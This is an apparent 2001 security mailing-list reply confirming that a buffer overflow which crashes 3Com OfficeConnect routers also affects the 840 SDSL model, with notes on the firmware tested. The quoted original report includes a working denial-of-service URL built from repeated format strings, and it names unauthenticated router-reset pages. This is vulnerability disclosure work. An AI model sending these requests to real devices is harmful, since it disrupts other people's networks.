Re: 3COM OfficeConnect DSL router vulneratibilities

[James Renken <jrenken () sandwich net>]

This buffer overflow exploit is effective against the 3Com OfficeConnect
Remote 840 SDSL router, as well.  NorthPoint Communications (and probably
other ISPs) resold this router in some areas of the U.S.

When I tested it, the router ceased to function and its LEDs began
flashing, but it did not automatically reset - I had to disconnect and
reconnect the power cable.  I tested this with software version 1.0.7,
firmware 4.2.  (The router model number is 3c840-US.)

The unprotected adsl_pair_select and adsl_reset problems aren't present on
the 840.

3Com helpfully provides no e-mail support for this product, and their
telephone support group was unable to find any support information for
it...

-- 
James Renken, System Administrator                    jrenken () sandwich net
Sandwich.Net Internet Services      http://sandwich.net/      760-729-4609


On Tue, 15 May 2001, inc wrote:

> Yesterday night I discovered a vulnerabilty. The router is a 3COM
> OfficeConnect 812 and the vulnerability is on the HTTP server, on port 80.
(snip)
> http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
> s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
> %s%s%s%s%s%s%s
>
> ...the router causes an NMI, red lights, flashing lights... and it's dead...
> it disconnect and come online again on a minute.
(snip)
> ANNEX:
>
> http://192.168.1.254/adsl_pair_select
> http://192.168.1.254/adsl_reset
>
> Very unsecure for strangers ;-)... the server here doesnt ask for password
> so you cant reset the router from the own web (and without credentials)